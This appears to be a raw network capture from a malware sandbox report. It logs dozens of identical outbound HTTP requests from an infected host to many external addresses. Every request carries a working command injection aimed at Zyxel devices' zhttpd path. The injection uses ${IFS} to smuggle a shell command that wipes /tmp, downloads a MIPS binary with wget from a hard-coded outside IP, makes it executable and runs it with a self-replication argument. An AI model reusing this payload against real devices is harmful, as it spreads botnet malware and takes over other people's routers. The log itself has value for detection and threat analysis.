                                                Jan 29, 2024 07:08:06.705168009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8893192.168.2.233282259.19.171.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.705218077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8894192.168.2.233678036.213.201.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.705249071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8895192.168.2.2359486187.46.140.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.705291986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8896192.168.2.2333910126.188.116.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.705328941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8897192.168.2.2358736204.188.142.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.705358982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8898192.168.2.2358146191.23.113.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.705398083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8899192.168.2.235926058.120.4.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.705435991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8900192.168.2.235498274.110.138.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.705490112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8901192.168.2.2351316121.186.68.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.705528975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8902192.168.2.234811683.177.79.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.705576897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8903192.168.2.2351260176.146.166.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.705619097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8904192.168.2.2347466219.6.125.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.705655098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8905192.168.2.2333842186.158.236.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.705691099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8906192.168.2.234102027.159.147.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.705718994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8907192.168.2.233931423.197.41.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.705774069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8908192.168.2.235529435.92.86.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.705789089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8909192.168.2.235898438.167.91.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.705835104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8910192.168.2.2347450218.191.117.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.705881119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8911192.168.2.235427475.240.70.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.705915928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8912192.168.2.2346132119.3.213.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.705948114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8913192.168.2.235763442.17.239.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.705984116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8914192.168.2.235635875.17.40.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.706039906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8915192.168.2.235354069.95.215.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.706069946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8916192.168.2.2341096201.33.62.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.706121922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8917192.168.2.234290867.7.204.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.706156969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8918192.168.2.234986884.191.48.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.706182003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8919192.168.2.235506081.111.243.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.706243992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8920192.168.2.2359924101.217.193.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.706279993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8921192.168.2.234673446.84.197.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.706322908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8922192.168.2.2338386185.179.48.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.706353903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8923192.168.2.235571844.255.108.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.706374884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8924192.168.2.233658895.182.130.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.706422091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8925192.168.2.235043893.177.123.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.706485033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8926192.168.2.2337600108.163.145.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.706517935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8927192.168.2.23580865.21.29.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.706557035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8928192.168.2.23467988.220.49.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.706610918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8929192.168.2.2335354165.226.45.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.706635952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8930192.168.2.2337322135.15.92.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.706665993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8931192.168.2.235233620.21.180.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.706732988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8932192.168.2.236034046.229.202.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.706777096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8933192.168.2.234252823.255.131.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.706835985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8934192.168.2.2345564198.15.178.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.706864119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8935192.168.2.234051872.11.220.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.706899881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8936192.168.2.235054666.236.222.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.706952095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8937192.168.2.2332944161.232.30.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.706994057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8938192.168.2.2360360165.5.53.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.707031965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8939192.168.2.2353264198.60.180.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.707078934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8940192.168.2.235994237.59.163.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.707117081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8941192.168.2.2343854102.109.150.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.707149982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8942192.168.2.233363673.114.39.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.707221031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8943192.168.2.2355200152.203.17.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.707246065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8944192.168.2.236041688.251.254.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.707282066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8945192.168.2.2353370131.112.132.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.707325935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8946192.168.2.2344550216.211.24.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.707396030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8947192.168.2.2354122165.39.19.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.707431078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8948192.168.2.2346094174.67.54.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.707454920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8949192.168.2.234450470.202.207.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.707506895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8950192.168.2.2353108203.166.105.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.707511902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8951192.168.2.235706089.197.156.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.707565069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8952192.168.2.2360158166.13.74.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.707590103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8953192.168.2.2345434108.8.88.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.707621098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8954192.168.2.2333256222.239.253.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.707658052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8955192.168.2.2352344132.254.59.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.707705975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8956192.168.2.234404682.39.217.158443
                                                TimestampBytes transferredDirectionData
